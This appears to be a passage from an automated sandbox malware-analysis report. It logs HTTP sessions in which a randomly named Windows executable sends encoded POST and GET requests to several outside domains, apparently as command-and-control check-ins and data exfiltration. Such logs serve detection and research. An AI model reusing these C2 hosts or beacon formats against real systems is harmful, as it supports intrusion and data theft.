                                                                          24192.168.2.450027128.65.195.180802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:41.626652002 CET372OUTGET /293d/?JPc=NBQdBBkPWTStX&L2m0Zn=7bOTn4s4CK+jD9Jyb+vO73Pd/AR3TsBOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRY9J7LzjC0OYPsgDdyhfDZaDgEJItAmmuk4= HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.evoo.website
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:43.107496977 CET458INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:42 GMT
                                                                          Server: Apache/2.4.25 (Debian)
                                                                          Content-Length: 278
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.450028217.70.184.50802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:48.325061083 CET646OUTPOST /vdvc/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.astorg-group.info
                                                                          Origin: http://www.astorg-group.info
                                                                          Referer: http://www.astorg-group.info/vdvc/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 46 38 66 61 4d 5a 69 54 77 76 6e 59 51 53 2f 61 7a 72 6c 46 4f 7a 70 50 67 71 31 73 5a 2b 4c 7a 43 67 63 46 2f 63 6c 4b 53 58 70 4c 37 4d 69 48 4f 36 51 32 77 63 32 4b 62 65 73 44 63 64 57 6c 39 64 4d 6c 69 75 4b 4b 52 50 64 71 58 4a 45 57 44 64 63 51 62 79 56 69 59 41 2b 42 44 4a 6c 4c 46 35 61 4f 6e 67 78 35 4a 4c 4c 69 72 65 64 75 2f 4f 30 54 51 48 41 33 6e 67 73 73 47 7a 2f 43 44 64 79 54 71 52 6c 35 35 45 4f 56 75 67 5a 68 70 41 79 6e 75 45 2b 4c 69 7a 6b 55 65 68 55 4c 62 61 2f 35 31 54 4e 74 78 79 42 41 30 74 56 70 38 65 36 73 50 77 3d 3d
                                                                          Data Ascii: L2m0Zn=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynuE+LizkUehULba/51TNtxyBA0tVp8e6sPw==
                                                                          Nov 12, 2024 08:53:49.123608112 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:49 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.450029217.70.184.50802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:50.869549036 CET666OUTPOST /vdvc/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.astorg-group.info
                                                                          Origin: http://www.astorg-group.info
                                                                          Referer: http://www.astorg-group.info/vdvc/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 49 7a 7a 4d 68 73 46 77 35 4a 4b 52 58 70 4c 6a 63 69 43 54 4b 51 6f 77 63 36 34 62 61 6b 44 63 5a 32 6c 39 59 77 6c 6a 5a 2b 4c 52 66 64 53 4d 5a 46 77 64 74 63 51 62 79 56 69 59 41 36 37 44 4a 39 4c 45 4a 4b 4f 6d 43 5a 36 45 72 4c 6a 73 65 64 75 79 75 30 58 51 48 41 46 6e 68 41 47 47 78 33 43 44 59 57 54 72 44 4e 36 77 45 4f 54 68 41 59 71 34 51 62 39 6a 56 54 32 70 56 34 59 42 79 59 73 61 63 79 6a 6b 69 73 36 6a 79 6c 7a 70 71 63 64 78 64 48 6c 55 2f 44 67 74 32 2f 57 51 58 45 72 56 2f 43 35 39 79 38 31 65 31 59 3d
                                                                          Data Ascii: L2m0Zn=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jylzpqcdxdHlU/Dgt2/WQXErV/C59y81e1Y=
                                                                          Nov 12, 2024 08:53:51.670789003 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:51 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.450030217.70.184.50802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:53.420595884 CET10748OUTPOST /vdvc/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.astorg-group.info
                                                                          Origin: http://www.astorg-group.info
                                                                          Referer: http://www.astorg-group.info/vdvc/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 4c 54 7a 4d 53 30 46 78 61 78 4b 51 58 70 4c 39 4d 69 44 54 4b 52 30 77 59 57 38 62 61 6f 54 63 66 36 6c 39 2b 6b 6c 79 63 53 4c 66 66 64 53 54 4a 46 6b 44 64 63 4a 62 30 31 63 59 41 71 37 44 4a 39 4c 45 50 4f 4f 79 67 78 36 43 72 4c 69 72 65 64 55 2f 4f 30 76 51 45 78 79 6e 68 30 38 47 41 58 43 43 34 47 54 70 32 35 36 2f 45 4f 52 6b 41 5a 71 34 51 47 6a 6a 56 66 74 70 56 6c 33 42 31 51 73 59 72 6a 6b 2f 69 59 43 79 77 42 66 33 63 55 56 6f 73 76 2f 58 6f 7a 48 6d 6a 79 4b 47 30 55 59 64 75 4c 68 36 52 6f 4e 61 31 38 2b 71 6a 74 51 37 45 6a 4e 51 48 64 54 43 78 70 41 47 4b 6c 48 63 4f 51 34 51 6c 51 6c 33 57 46 44 48 49 70 42 7a 57 59 32 74 63 6e 53 33 34 35 32 4a 68 44 74 33 44 42 6a 37 35 63 44 4f 7a 75 35 79 63 6d 50 67 4d 69 44 72 69 4b 6b 43 31 57 5a 4a 41 69 61 36 52 66 51 34 2f 35 48 4e 35 48 55 64 32 49 4b 6a 4b 6b 4f 59 74 56 76 47 52 75 75 6f 7a 4d [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZLTzMS0FxaxKQXpL9MiDTKR0wYW8baoTcf6l9+klycSLffdSTJFkDdcJb01cYAq7DJ9LEPOOygx6CrLiredU/O0vQExynh08GAXCC4GTp256/EORkAZq4QGjjVftpVl3B1QsYrjk/iYCywBf3cUVosv/XozHmjyKG0UYduLh6RoNa18+qjtQ7EjNQHdTCxpAGKlHcOQ4QlQl3WFDHIpBzWY2tcnS3452JhDt3DBj75cDOzu5ycmPgMiDriKkC1WZJAia6RfQ4/5HN5HUd2IKjKkOYtVvGRuuozMl1NyCIoGE3aO9bSPrtO2sr+hbmraF9W1JTaoe4ad9c1gFgTnb9jlLyMiEOnx9r6RyUk5rfiMY82b18Xjl+54z9AG79rfn81UpmqpXuEhaAikh4eGhzgJuBR+KilaprtwtW7G1LG6ytnsM2ZRba6aUsJY+rKT6CcT7ROGsK0NWyX5rC0h7FiZTUgLtR4OUBp8jvvgtk9d+t3sp5JtylfK5HOyjPC6MGoI6bxwNsk/VVtfeiIzC/n2x4GCLP8ZiMIgE6K+sCXmV3b/0uagCTlrRHLPrCRCNqkeepPLW3xz96T/t1G3zpWhAsaGlKBGG2Qt1jVp9CKW0s3RTj863z9MjTcb2lz4Y3VV1wSOGt5IuDhvRVrEatPtxo2LY5ufQ2R1iv6heCC519op3SvV3dyXhHvADn3DVEip9uUmRNkjmI4K6lvHuCO2keZBhUXI+IdKeGfXM6xna8nwCqQy/fxLS7x0L1wdL/vo1pn2Rk6SpKA15dtupgoJCqXoz6DOHogmXni3GkeWJOaI0rsF5oROSi2x6smH1WVz6PllZmEYZrY3FqWgqBAXQl0xhtC0/EeScc98SAC5cowht8T9WetEZ/YhL/vrw4CtpDU4FyryfyGRPMWjxxVvsdwU+DMhr7+PuFijWXTQQlE4RT45ZqBFbgJtyw+HCXQupH [TRUNCATED]
                                                                          Nov 12, 2024 08:53:54.882843971 CET713INHTTP/1.1 502 Bad Gateway
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:54 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 568
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                          Nov 12, 2024 08:53:54.882913113 CET713INHTTP/1.1 502 Bad Gateway
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:54 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 568
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                          Nov 12, 2024 08:53:55.095855951 CET713INHTTP/1.1 502 Bad Gateway
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:54 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 568
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.450031217.70.184.50802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:53:55.962591887 CET377OUTGET /vdvc/?L2m0Zn=5MdYmwdbGD0BDYmZXtqVosi+TlTx67ljMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReNcAXJ0cKe8GCCdvHCelE6JjJemFhTRqEaU=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.astorg-group.info
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:56.780817032 CET1236INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:53:56 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Content-Security-Policy: default-src 'self'; script-src 'nonce-c0750c50df504ad99b8ce8ab6b0add39';
                                                                          Vary: Accept-Language
                                                                          Data Raw: 39 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 63 30 37 35 30 63 35 30 64 66 35 30 34 61 64 39 39 62 38 63 65 38 61 62 36 62 30 61 64 64 33 39 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                          Data Ascii: 93a<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-c0750c50df504ad99b8ce8ab6b0add39';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article
                                                                          Nov 12, 2024 08:53:56.780832052 CET1236INData Raw: 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d
                                                                          Data Ascii: class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?sea
                                                                          Nov 12, 2024 08:53:56.780843973 CET190INData Raw: 28 27 63 6c 69 63 6b 65 72 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28
                                                                          Data Ascii: ('clicker').addEventListener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'astorg-group.info'); }); });</script></main></div> </body></html>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.4500323.33.130.190802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:01.946830034 CET625OUTPOST /0m8a/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.fiqsth.vip
                                                                          Origin: http://www.fiqsth.vip
                                                                          Referer: http://www.fiqsth.vip/0m8a/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
